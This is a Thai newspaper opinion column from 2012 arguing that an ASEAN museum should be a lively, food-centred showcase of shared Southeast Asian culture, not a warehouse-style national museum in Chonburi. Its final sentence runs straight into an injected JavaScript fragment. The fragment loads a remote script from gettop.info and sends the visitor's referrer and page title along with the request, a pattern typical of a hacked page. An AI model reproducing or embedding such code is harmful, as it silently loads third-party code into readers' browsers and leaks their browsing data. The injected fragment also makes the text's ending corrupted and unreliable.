Download PDF

มติชนรายวัน ฉบับประจำวันพุธที่ 15 สิงหาคม 2555

 

          สร้าง“มิวเซียมอาเซียน”ให้เป็นแหล่งมหรสพการเรียนรู้อย่างรื่นรมย์ทางสังคมวัฒนธรรมอาเซียน ดีกว่าตั้งพิพิธภัณฑสถาน“แห่งชาติ”อาเซียน ให้เป็นโกดังเก็บขยะเก่าๆ

          นายกฯ มอบหมายให้ ก. วัฒนธรรม (วธ.) ร่วมกับ ก. พัฒนาสังคมและความมั่นคงของมนุษย์ (พม.) ขับเคลื่อนเรื่องสังคมและวัฒนธรรม เมื่อคราวประชุมเชิงปฏิบัติการเพื่อเตรียมความพร้อมเข้าสู่ประชาคมอาเซียน (มติชน วันพฤหัสบดี 2 ส.ค. 2555 หน้า 22)

          แสดงให้เห็นว่านายกฯ ตาถึง มองทะลุ ว่าแท้จริงแล้ว วธ. กับ พม. มีภารกิจเดียวกันเกี่ยวกับสังคมและวัฒนธรรม ตั้งแต่อดีตจนปัจจุบันถึงอนาคต โดย“ยกอดีต รับใช้ปัจจุบัน สร้างสรรค์อนาคต”

          ปัญหาอยู่ที่รัฐมนตรีตามความคิดของนายกฯ ทันไหม?

          รัฐมนตรี วธ. จะขับเคลื่อนเรื่องสังคมและวัฒนธรรมอาเซียน โดยบอกว่า “ตั้งพิพิธภัณฑ์อาเซียน ที่แหลมแท่น จ. ชลบุรี เพื่อให้ประชาชนในอาเซียนรู้ว่าจุดกำเนิดอาเซียนเริ่มจากประเทศไทย”

          นายกฯ ควรชี้แนะรัฐมนตรี วธ. ด้วยเมตตาอย่างยิ่งว่า

          1. ประชาชนในอาเซียนไม่อยากรู้หรอกว่าประชาคมอาเซียนมีจุดกำเนิดเริ่มจากไทย หรือเริ่มจากไหนก็ไม่อยากรู้ทั้งนั้น

          2. ถึงอยากรู้ ก็ไม่ต้องไปหาความรู้ไกลถึงชลบุรี เรื่องแค่นี้เปิดหาตามเน็ตได้ง่ายๆ

          3. สิ่งที่ชลบุรีควรมี คือ มิวเซียมชลบุรี ที่จัดแสดงแบ่งปันเผยแพร่ความรู้ว่า ชลบุรีมาจากไหน? หรือบ้านเมืองและผู้คนชายฝั่งทะเลตะวันออกมาจากไหน? ซึ่งจะเกี่ยวข้องกับการค้าทางทะเลสมุทร กับโจรสลัด จัดแสดงได้สนุกจะตายไป

          สังคมและวัฒนธรรมอาเซียนที่นายกฯ ควรมีบัญชาให้ วธ. กับ พม. ร่วมกันคิดทำ คือ มิวเซียมอุษาคเนย์ ซึ่งมีไทยตั้งอยู่บริเวณศูนย์รวมเส้นทางคมนาคมทางทะเล (เรือใบ) ในอดีต และทางอากาศ (เรือบิน) ในปัจจุบันและอนาคต

          ประชาคมอาเซียนมี“วัฒนธรรมร่วม”หลายอย่าง เช่น กินข้าวเป็นอาหารหลัก, มีกับข้าวประเภท“เน่าแล้วอร่อย”, อยู่เรือนเสาสูง, ผู้หญิงเป็นหัวหน้า, กบเป็นสัตว์ศักดิ์สิทธิ์บันดาลให้เกิดน้ำและความอุดมสมบูรณ์, พิธีศพหลายวัน (ก่อนรับศาสนาอิสลาม), ตีฆ้องส่งเสียงศักดิ์สิทธิ์สื่อสารกับอำนาจเหนือธรรมชาติ, ฟ้อนเต้นท่ากบ เป็นต้น

          ที่ยกตัวอย่างมานี้ ล้วนมีหลักฐานประวัติศาสตร์โบราณคดีสนับสนุนทั่วทุกประเทศในอาเซียน รวมทั้งในไทย

          จุดขายของมิวเซียมอาเซียน คือเป็น“มิวเซียมกินได้” โดยจัดแสดงเรื่องข้าวปลาอาหารอาเซียน“เน่าแล้วอร่อย” อย่างร้านอาหารทั่วไป แล้วทำขายด้วย

          ทำมิวเซียมอาเซียนอย่างนี้ให้สนุกยังไงก็ได้ มีตลาดรองรับแล้วคือนักท่องเที่ยวจากทั่วโลก รวมทั้งจากประชาคมอาเซียนd.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;